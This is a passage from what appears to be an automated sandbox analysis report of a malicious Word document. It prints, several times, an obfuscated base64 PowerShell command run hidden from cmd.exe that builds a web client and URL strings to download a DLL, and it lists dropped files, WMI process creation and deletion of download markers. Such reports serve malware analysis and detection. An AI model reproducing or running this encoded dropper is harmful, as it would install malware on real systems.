oAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK	Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000905B push ecx; ret	7_2_1000906E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_1000E3C5 push ecx; ret	7_2_1000E3D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001BCE92 push cs; retf	7_2_001BCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001FCE92 push cs; retf	10_2_001FCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_0030CE92 push cs; retf	11_2_0030CE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001CCE92 push cs; retf	13_2_001CCE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_001ACE92 push cs; retf	15_2_001ACE94
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_0020CE92 push cs; retf	18_2_0020CE94

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\O_wgqv7\C0316em\Lyeta6ud.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Yozs\bhycn.bcx

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yozs\bhycn.bcx:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hxqt\iieutea.ehw:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Yjfs\gmxhcr.dhy:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Hszr\zft.hxn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vnjt\awo.cnn:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Dkpu\lbsvbo.gas:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Opqf\zrop.pvh:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Blgp\gmlbr.kph:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mnrm\xmfd.ucf:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Wnoc\mhxywle.szw:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xqby\jcrucsb.dql:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Etxd\pkvco.wzp:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eiig\mmslr.ajj:Zone.Identifier read attributes \| delete

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000BA3C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

7_2_1000BA3C

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
